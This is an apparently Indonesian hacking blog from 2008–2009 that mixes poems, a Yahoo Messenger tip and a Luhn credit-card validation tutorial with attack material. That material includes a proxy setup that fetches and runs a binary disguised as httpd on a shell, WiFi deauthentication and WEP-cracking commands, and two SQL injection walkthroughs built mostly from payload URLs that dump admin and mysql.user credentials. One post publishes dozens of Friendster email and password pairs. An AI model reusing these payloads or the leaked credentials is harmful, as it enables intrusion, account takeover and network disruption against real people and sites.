hehe.. ada yang tau proxy itu apa??
proxy thu buat nyamarin ip kita menjadi ip shell kita, jadi g gampang kena DDOS, WINUKES, de el el na..
gini cara buat proxy na.. gampang banget ..
1. login ke shell loe
2. wget http://t.i.a.n.tripod.com/data/vie.tgz atau kalo gag bisa ketik curl -o proxy.tgz http://t.i.a.n.tripod.com/data/vie.tgz
2. extract, tar -zxvf vie.tgz
3. cd pro
4. ./xh -s “/usr/sbin/httpd”
5. ./prox -a -d -pPORT ( example ./prox -a -d -p11069
Buat Proxy Sendiri
Posted in tuToRIaL on September 9, 2009 by ibnfahdhack wifi pake backtrack 3
Posted in hAckInG on August 28, 2009 by ibnfahdDi dalam backtrack terdapat tools aircrack untuk hacking wifi, dan aircrack ini memiliki sejumlah kawan di antaranya aireplay-ng, airodump-ng, airmon-ng dan lain sebagainya.
Nah kali ini saya akan menjelaskan penggunaan dari aireplay-ng:
a. Aktifkan device wireless menjadi mode monitor
airmon-ng <start|stop|check> <interface>
Penjelasan :
airmon-ng : design wireless device menjadi mode monitor
start,stop,check : [aktifkan, nonaktifkan, mengecek] wireless device berada di mode apa
interface : device wireless
Contoh : airmon-ng start wlan0
maka hasilnya :
Interface Chipset Driver
wlan0 Unknown iwlagn – [phy0]
(monitor mode enabled on mon0)
b. Mematikan seluruh client
aireplay-ng – -deauth [count] -c FF:FF:FF:FF:FF:FF -a [AP MAC] device_wifi
Penjelasan :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.
Contoh : aireplay-ng – -deauth 10 -c FF:FF:FF:FF:FF:FF -a [AA:BB:CC:DD:EE:FF] mon0
c. Mematikan satu client
aireplay-ng – -deauth [count] -c [MAC client] -a [AP MAC] device_wifi
Penjelasan :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.
Contoh : aireplay-ng – -deauth 10 -c A1:B2:C3:AF:DF:A4 -a [AA:BB:CC:DD:EE:FF] mon0
Kadang perintah aireply diatas tidak bisa karena channel dari AP-nya tidak sama dengan channel device wireless, jadi ulangi perintah tersebut hingga channel AP sama dengan device wireless yang kita miliki.
http://indobacktrack.or.id/2009/06/hacking-wifi-di-backtrack-3/
KELAMAHAN SISTEM KEAMANAN “WEP”
Posted in tuToRIaL on August 28, 2009 by ibnfahdARTIKEL INI UNTUK MENUNJUKKAN KELEMAHAN“WEP” YANG SANGAT RENTAN UNTUK DIHACK, SEDANGKAN TARGET HANYA SEBUAH AP MILIK SENDIRI
====================================================================================
BACK TRACK BACK TRACK BACK TRACK — card eth1
====================================================================================
1. setup wifi
============================
console 1
============================
airmon-ng stop eth1
airmon-ng start wifi0
2. periksa sinyal – sinyal AP
============================
console 1
============================
airodump-ng eth1
============================
sasaran
============================
SSID : NETGEAR2
CHANNEL : 1
MAC AP (BSSID) : 00:90:4C:7E:00:10
MAC CLIENT-AP : 00:08:9F:F1:07:2B
3. menangkap ivs
a. menangkap ivs
============================
console 2
============================
airodump-ng –-channel 1 -–bssid 00:90:4C:7E:00:10 -w hasil eth1
b. membanjiri packet arp
==============
[console 3]
==============
aireplay-ng –-arpreplay -b 00:90:4C:7E:00:10 -h 00:08:9F:F1:07:2B eth1
c. lakukan Deauthentication
==============
[console 4]
==============
aireplay-ng –deauth 5 -c 00:08:9F:F1:07:2B -a 00:90:4C:7E:00:10 eth1
4. membuka hasil ivs (ivs = 25000)
aircrack-ng hasil*.cap
Validate Credit Card Numbers
Posted in tuToRIaL on July 25, 2008 by ibnfahdEntering a credit card number on a web page has become commonplace. This hack verifies the entered credit card number, then submits it to the server component only if the number is valid. Nothing else changes on the page except for a user message, which notifies the user of any error conditions or that the credit card has passed muster and has been sent to the server to be processed. (Although we won’t discuss them here, as in “Validate Email Syntax” , the server component then implements its own credit card validation routines.)
The server connection will likely be initiated over Secure Sockets Layer (SSL), such as with the HTTPS protocol, and be involved with an e-commerce component that further verifies the purchase information with a merchant bank. This hack, however, just verifies the number, generates a message, and makes an HTTP request using Ajax techniques.
Enter a credit card number for verification
This is the web page code. It imports two JavaScript files, http_request.js and cc.js:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script type="text/javascript" src="js/http_request.js"></script>
<script type="text/javascript" src="js/cc.js"></script>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Enter credit card number</title>
</head>
<body>
<h3>Please enter your payment information</h3>
<div id="message"></div>
<p>
[Name and billing address appear here]
</p>
<p>
Credit card type:
</p>
<form action=”javascript:void%200″>
<p>
<select name=”cctype”>
<option value=”Choose one…”>Choose one…</option>
<option value=”Mastercard”>Mastercard</option>
<option value=”Visa”>Visa</option>
<option value=”American Express”>American Express</option>
<option value=”Discover”>Discover</option>
</select>
</p>
<p>
Credit card number (#### #### #### #### or no spaces):
<input type=”text” name=”cc” size=”16″ maxlength=”19″ />
</p>
<p>Expiration date:
<select name=”exp_month”>
<option>January</option>
<option>February</option>
<option>March</option>
<!etc…–>
</select>
<select name=”exp_year”>
<option>2005</option>
<option>2006</option>
<option>2007</option>
<!etc…–>
</select>
</p>
<p>
Card Security code:
<input type=”text” name=”scode” size=”4″ maxlength=”4″ />
</p>
<p>
<button type=”submit” name=”submit” value=”Submit”>Submit</button>
</p>
</form>
</body>
</html>
The user chooses a credit card type (e.g., “Mastercard”); enters the card number, expiration date, and card security code (CSC); and clicks the Submit button. However, instead of having the page dissolve and the values depart immediately for the server, the application verifies a few conditions first. The JavaScript makes sure that the fields are not blank and contain the required minimum number of characters (such as three for the CSC), and then it verifies the card number using the Luhn formula or algorithm.
The Luhn forumla is a well-known algorithm used to verify ID numbers like credit card numbers. See http://en.wikipedia.org/wiki/Luhn_formula for details.
If one of these checks fails, the hack displays an error message in red. Figure shows one of these messages.
Time to reenter the credit card number
If the credit card number is verified and everything else has been correctly entered, the hack uses XMLHttpRequest to send this information to a server.
We are not strictly making a secure connection in this hack, but a real application would not send any purchase information unencrypted over a network. In addition, it is worth mentioning a second time that the main job of validating a credit card rests with the processing server component(s).
A message in blue notifies the user that the organization is processing the credit card.
Verifying the Card Number
cc.js contains the code for responding to the user’s button click, as well as for verifying the information and generating a user message. http_request.js (see “Use Your Own Library for XMLHttpRequest”) creates and calls the methods of XMLHttpRequest. Here is the code contained in cc.js:
var finalCnumber;
window.onload=function( ){
document.forms[0].onsubmit=function( ){
verify(this.cc.value,this.scode.value,this.cctype.value,
this.exp_month.value+” “+this.exp_year.value);
return false;
};
}
//credit card number, security code, credit card type, and expiration date
function verify(ccard,secure_code,cctype,ccexp){
if(secure_code.length < 3) {
eMsg(”Please enter a valid value for the security code.”,”red”);
return;}
if(cctype==”Choose one…”) {
eMsg(”Please enter a valid value for the credit card type.”,”red”);
return;}
if (! clientsideVerify(ccard)) {
eMsg(”Please enter a valid value for the credit card.”,”red”);}
else{
eMsg(”Please wait while we process the credit card.”,”blue”);
ccard=remDashSpace(ccard);
url=”http://www.parkerriver.com/s/verify?cc=”+
encodeURIComponent(ccard)+”&scode=”+
encodeURIComponent(secure_code)+”&type=”+
encodeURIComponent(cctype)+”&exp=”+
encodeURIComponent(ccexp);
httpRequest(”GET”,url,true,handleCheck);
}
}
/* Check whether the credit card entry is null, is not lengthy enough,
or contains any letters. Remove any dashes or spaces from the entry,
then run the Luhn algorithm on the resulting number. */
function clientsideVerify(ccVal){
if(ccVal == null || ccVal.length < 13 ||
ccVal.search(/[a-zA-Z]+/) != -1){ return false; }
ccVal=remDashSpace(ccVal);
return (applyLuhn(ccVal) % 10) == 0;
}
//http://en.wikipedia.org/wiki/Luhn_formula
function applyLuhn(cc){
//reverse the String
var rev = reverse(cc);
//get array of character Strings
var revArr = rev.split(”");
var total = 0;
var tmp = 0;
//add up the numbers
for(var i = 0; i < revArr.length; i++){
if((i % 2) > 0){
tmp = revArr[i]*2;
tmp= (tmp < 9 ? tmp : (tmp - 9) );
total += tmp;
} else {
total += Number(revArr[i]);
}
}//end for
return total;
}
//event handler for XMLHttpRequest
function handleCheck( ){
var sTag,answer,xmlReturnVal;
if(request.readyState == 4){
if(request.status == 200){
//implement Document object in DOM
xmlReturnVal = request.responseXML;
sTag = xmlReturnVal.getElementsByTagName(”cc_status”)[0];
answer= sTag.childNodes[0].data;
if(answer==”okay”){
eMsg(”Your purchase information has”+
” been submtted to our online store.”,”blue”); }
else {
eMsg(”There was a problem with processing “+
“the credit card.”,”red”); }
} else {
alert(”A problem occurred with communicating “+
“between the XMLHttpRequest object and the server program.
“);
}
}//end outer if
}
/* Utility functions:
reverse a string. */
function reverse(str){
var sArray = str.split(”");
var newS=”";
for(var i = sArray.length-1; i >= 0; i–){
newS += sArray[i];
}
return newS;
}
//generate a styled message
function eMsg(msg,sColor){
var div = document.getElementById(”message”);
div.style.color=sColor;
div.style.fontSize=”0.9em”;
//remove old messages
if(div.hasChildNodes( )){
div.removeChild(div.firstChild);
}
div.appendChild(document.createTextNode(msg));
}
//remove dashes or spaces
function remDashSpace(_number){
number = _number.replace(/-/g,”");
number = _number.replace(/ /g,”");
return _number;
}
There is a lot of functionality to absorb here, so first we will discuss the button click. When the browser completes loading the web page, this event is captured by the code window.onload. This event handler is a sensible place to set up other event handlers, because the browser is guaranteed to have finished loading any other HTML tags that might be used by these handlers. Next, the code sets up an event handler for when the user submits the form:
document.forms[0].onsubmit=function( ){
verify(this.cc.value,this.scode.value,this.cctype.value,
this.exp_month.value+” “+this.exp_year.value);
return false;
};
The form’s onsubmit event handler points to a function that calls verify( ), then returns false, which effectively cancels the browser’s form submission. We are using the request object to send the form values only after verifying that the submissions are valid. Let’s look at the verify( ) function:
function verify(ccard,secure_code,cctype,ccexp){
if(secure_code.length < 3) {
eMsg("Please enter a valid value for the security code.","red");
return;}
if(cctype=="Choose one...") {
eMsg("Please enter a valid value for the credit card type.","red");
return;}
if (! clientsideVerify(ccard)) {
eMsg("Please enter a valid value for the credit card.","red");}
else {
eMsg("Please wait while we process the credit card.","blue");
ccard=remDashSpace(ccard);
url="http://www.parkerriver.com/s/verify?cc="+
encodeURIComponent(ccard)+"&scode="+
encodeURIComponent(secure_code)+"&type="+
encodeURIComponent(cctype)+"&exp="+
encodeURIComponent(ccexp);
httpRequest("GET",url,true,handleCheck);
}
}
This function includes a number of common-sense checks before it validates the credit card number using another function, clientsideVerify( ). If the latter function returns true, the code builds a URL for the server component and then uses XMLHttpRequest to send the card information.
The httpRequest( ) function is responsible for setting up XMLHttpRequest and connecting with the server. Again, this function takes four parameters:
- The type of request, as in GET or POST
- The URL or server web address
- A Boolean indicating whether the request is asynchronous or not
- The name of a function or a function literal that handles the server response
The function name should be passed in without the following parentheses, as in handleCheck. It can also be a function literal, as in
httpRequest("GET",url,true,function( ){ //...});
The httpRequest( ) code appears in the filehttp_request.js (see”Use Your Own Library for XMLHttpRequest” ).
Shooting the Luhn
The clientsideVerify( ) function verifies that the credit card number is at least 13 characters long and does not contain any letters. If the credit card number passes these checks, the code removes any spaces or dashes from the string and calls a function that uses the Luhn formula:
function clientsideVerify(ccVal){
if(ccVal == null || ccVal.length < 13 ||
ccVal.search(/[a-zA-Z]+/) != -1){ return false; }
ccVal=remDashSpace(ccVal);
return (applyLuhn(ccVal) % 10) == 0;
}
Here is the code for the applyLuhn( ) function:
function applyLuhn(cc){
//reverse the String
var rev = reverse(cc);
//get array of character Strings
var revArr = rev.split("");
var total = 0;
var tmp = 0;
//add up the numbers
for(var i = 0; i < revArr.length; i++){
if((i % 2) > 0){
tmp = revArr[i]*2;
tmp= (tmp < 9 ? tmp : (tmp - 9) );
total += tmp;
} else {
total += Number(revArr[i]);
}
}//end for
return total;
}
Information on the Luhn formula or algorithm is easily found on the Web, so we will not take up a lot of space describing it here.
This function takes a string of numbers, applies the formula to the numbers, and returns the sum to clientsideVerify( ). If the total can be evenly divided by 10, the credit card number is valid. Here is the piece of code from clientsideVerify( ) that makes this determination:
return (applyLuhn(ccVal) % 10) == 0;//returns true or false
The server component returns a bit of XML indicating success or failure, mimicking the processing of a purchase order (as in <cc_status>okay</cc_status>). The handleResponse( ) function generates a user message from this return value:
xmlReturnVal = request.responseXML;
sTag = xmlReturnVal.getElementsByTagName("cc_status")[0];
answer= sTag.childNodes[0].data;
if(answer==”okay”){
eMsg(”Your purchase information has”+
” been submtted to our online store.”,”blue”); }
The eMsg( ) function is responsible for generating a styled user message in red, in the event of an error in handling the purchase information, or in blue otherwise. However, the entire process takes place backstage; the web page never refreshes, and only small parts of the user interface change as the user interacts with the application.
password friendster
Posted in hAckInG on July 10, 2008 by ibnfahdklo mo iseng tolong jangan mengganti password friendster r_81marie@yahoo.com 810327 So_van21@yahoo.com ojolali ryan_crens@yahoo.co.id 551812 cia_yung@yahoo.com ronniedunk 4l3x_5tev3n@yahoo.com Dublin allan_bamboo@yahoo.com guess04 marielpingol@yahoo.com leiram apoybotey@yahoo.com julia aliiefbecks@yahoo.com rangkoto sexy_upps@yahoo.com dWias finee_imoet@yahoo.com jippynee chomak_cueq@yahoo.co.id 140280 aqil_kent@yahoo.com 141414 sellynjoy@yahoo.com.ph 552314 exxero_@yahoo.com 180880 viene_17@yahoo.com 042982 chuck_dj08@yahoo.com a1a2a3 mhoare1211@yahoo.com glenwood Carlion_lango@yahoo.com 123456 nurakmal_88@yahoo.com akmal88 Yamasigit@yahoo.com 290182 renal_ray@yahoo.co.id 68974230 fleid_takahashi04@yahoo.com elazul asiangmaria2000@yahoo.ca princess mehdreloaded@hotmail.com mmmmmm suhaila_sapari90@yahoo.com 4846516 luphluph_leezhaa@yahoo.com goblok babun_laut_rumput@yahoo.com hubbysuluk coco_lolitaz@hotmail.com friendfore Ainieyboy_299@yahoo.com.my 164549 sophia_venice06@yahoo.com 7350754558 Geralldo_irule@yahoo.co.id 09122005 blood_on_blade@yahoo.co.id anjink blueeyore_1109@yahoo.com 987456
Nyanyian Embun Senja
Posted in kUmpULan PuISi on June 30, 2008 by ibnfahdHingga akhirnya
aku
pedih perih
takkan melibasku
tekadku
kau tanya
keteguhan hati
jawab ku
tak ragu
terus menuju
pedang kejam
libas dadaku
tetesan kebenaran
bersatu tanah
kembali sesuci
akan pulang
senja memanggil
dan hijau daun
menetes embun
karya ku
pasuruan, juni 2008
created by fizdan@yahoo.com
Membuat banyak ID di YM
Posted in tuToRIaL on June 26, 2008 by ibnfahdBerawal dari pertanyaan teman saat chating pake YM tentang bagaimana membuat ID lebih dari satu di YM dan….
gak tau ah kehabisan kata2. Langsung aja
1. buka YM(Yahoo Messenger)
2. klik pada table menu Messenger
3. trus klik My Profiles
4. klik Create/edit Profiles
5. Create New Public Profile
6. trus……….ya trus kan sendiri, 
buat ID baru
7. selesai deh buat ID nya tapi kok gak isa di pakek ya 
. add dulu ID yang kamu buat seperti kamu add teman.
8. trus sign out dan sign in lagi pake ID yang kamu buat tadi.
ya gitu aja deh…… thank’s buat Bang IndoUnderground yang slalu membimbing ku , dan Bang xshadow yang slalu memberi jawaban atas pertanyaan2 ku meskipun kadang….. hehehehe….;))
Renungan
Posted in kUmpULan PuISi on June 25, 2008 by ibnfahdkehidupan tak pernah lepas dari takdir
dalam kenyataannya
semua telah dituliskan
dalam diri masing-masing mahluk
tapi, mengapa manusia tak pernah bersyukur
padahal,
mereka telah diberi nyawa
mereka telah diberi nafas
dan mereka telah ditetapkan kematiannya
namun itu lah kehidupan yang sesungguhnya.
created by bLoSsoM_
Keluh
Posted in kUmpULan PuISi on June 25, 2008 by ibnfahdtangan hampa
ingat lupa
tak tau ingin apa
hidup serasa nafi
itu tlah terjadi
bagaimana hadapi
tergantung hati
kendalikan emosi
dan sadar diri
slalu ingat ilahi
Sang Pencipta hati
ini
created by AnakinCasper
sql injection
Posted in tuToRIaL on June 25, 2008 by ibnfahd1.) Cek Kutu
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url ‘
contoh http://www.target.com/news.php?id=5′
maka akan muncul error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
Atau Yang mendekati
Itu berarti kita bisa gunakan Sql Injection
2). Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1/* <– no error
http://www.target.com/news.php?id=5+order+by+2/* <– no error
http://www.target.com/news.php?id=5+order+by+3/* <– no error
http://www.target.com/news.php?id=5+order+by+4/* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4′ in ‘order clause’ atau sesuatu seperti itu…ya gitu degh ( )
Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+union+select+1,2,3/*
NOTE: jika /* tidak bisa atau terjadi error, coba dengan –
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*
dan kamu akan mendapatan versi MySql D
5). Mendapatkan table dan nama column
Jika versi MySQL adalah < 5 (contoh : 4.1.33, 4.1.12…) <— nanti saya akan menerangkan untuk MySQL > 5 version.
kita harus menebak table dan nama column menurut perkiraan.
jika nama tablenya: user/s, admin/s, member/s …
jika nama kolomnya: username, user, usr, user_name, password, pass, passwd, pwd etc…
contohnya seperti
http://www.target.com/news.php?id=5+union+all+select+1,2,3+from+admin/* (jika kita melihat nomor dua ditampilan, berarti benar table tersebut)
kita tahu tablenya adalah admin…
sekarang kita cek nama column.
http://www.target.com/news.php?id=5+union+all+select+1,username,3+from+admin/* (jika yang keluarnya error, coba nama column yang lain)
kita mendapatkan tampilan username, contohnya seperti admin, atau superadmin dll…
sekarang kita cek column password ada apa tidak
http://www.target.com/news.php?id=5+union+all+select+1,password,3+from+admin/* (jika kamu mendapatkan error, coba nama column yang lain)
kita melihat password di tampilan dalam bentuk hash atau plain-text, itu tergantung dari isi database
contoh md5 hash, mysql hash, sha1…
sekarang kita harus menyelesaikan query biar terlihat bagus )
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0×3a,password),3+from+admin/*
catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(58), merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin/*
URL encrypt di
http://andi.lp3i.net/tools/asci.htm
sekarang kita mendapatkan username:password di tampilan, contoh admin:admin atau admin:somehash
jika kamu mendapatkan itu, kamu bisa login sebagai admin atau superuser D
jika tidak dapat menebak nama table, kamu bisa selalu mencoba mysql.user (default)
sedangkan columnya user dan password, jadi contohnya seperti
http://www.target.com/news.php?id=5+union+all+select+1,concat(user,0×3a,password),3+from+mysql.user/*
Cukup sudah untuk bagian ini, sekarang kita masuk bagian yang susah
create by http://indounderground.wordpress.com
Classic SQL Injection Tutorial
Posted in tuToRIaL on June 25, 2008 by ibnfahd————————————————
Classic SQL Injection Tutorial
————————————————
First of all check for vulnerability.
http://www.example.com/news.php?id=1
Now to test it if is vulnerable we add to the end of url ‘ (quote), and that would be http://example.com/news.php?id=1′
So if we get error in that page like this :
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
That means because is vulnerable to sql injection
Now we need to find the number of columns
To find number of columns we use statement order by (tells database how to order the result)
Well lets just incrementing the number until we get an error.
http://www.example.com/news.php?id=1 order by 1/* <– no error
http://www.example.com/news.php?id=1 order by 2/* <– no error this Unknown column ‘3′ in ‘order clause’ or something like that)
http://www.example.com/news.php?id=1 order by 3/* <– error (we get message like this Unknown column ‘3′ in ‘order clause’ or something like that)
That means because the it has a 3 columns , because we got an error on 4.
Now lets check the union function
What we can do with Union?
With union we can select more dada in one sql statement.
So lets start 
http://www.example.com/news.php?id=1 union all select 1,2,3/* (we already found that number of columns)
So if , you see some numbers on the screen example 1 or 2 or 3 or 4 etc.. then congratz coz the Union Works
Now we need to check for the Mysql Version
Lets do it fast baby
http://www.example.com/news.php?id=1 union all select 1,2,3/* NOTE: if /* that doesnt work or you get some error, then try with –
it’s important for our query to work properly.
People lets say because that we have number 3 on the screen , now we need to check for the MySql Version.
Lets do it.
Now we need to replace the number of 3 with @@version or version() and to get someting like 4.1.33-log or 5.0.45 or similar.
so it should look like this http://www.example.com/news.php?id=1 union all select 1,@@version,3/*
So , if you get a error like this “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Then we need to convert () function
okey lets try
http://www.example.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*
Or lets try with Hex () and Unhex ()
http://www.example.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*
and then people , we will get the MySQL Verzion yaaa ..
Now we need to get the table and the column name.
So if the MySQL Version is example: ( 4.1.33, 4.1.12…)
We must guess the table and column name in the most cases.
Common table names are: user/s, admin/s , member/s …….
Common Column Names are : username , user , usr , user_name , password , pass , passwd , pwd etc ///
Would be like this :
http://www.example.com/news.php?id=1 news.php?id=1 union all select 1,2,3 from admin/* (if we see number 3 on the screen like before, thats very good.
So we know that table admin exists ..
SO now we need to check column names , lets do it.
http://www.example.com/news.php?id=1 union all select 1,username,3 from admin/* (if you get a error, then you need to try the other column name)
We will get username displayed on screen, example would be admin , or other etc..
Now we need to check if column password exists.
http://www.example.com/news.php?id=1 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
Now , We seen the password on the screen in the hash or plain-text, its depends of how the database is set up xD
The hash should be md5 hash , mysql hash , etc…
Now people , we must do it .. to complete query to look very good.
To do that , we can use concat () function (it joins strings)
Example:
http://www.example.com/news.php?id=1 union all select 1,concat (username,0×3a,password),3 from admin/*
/* Note : That 0×3a , its a hex value for: [so 0x3a is a hex value for colon]
We have and another way for doing that , example: char(58), ascii value for.
http://www.example.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*
Now we will get displayed username:password on screen example : admin:hash or admin:password
When u will hav e this , you can login like Website admin or website Super Administrator.
If you can’t guess the table name right , alwas you can try mysql.user (default)
It has user and password columns , so example would be like this :
http://www.example.com/news.php?id=1 union all select 1,concat(user,0×3a,password),3 from mysql.user/*
The End.
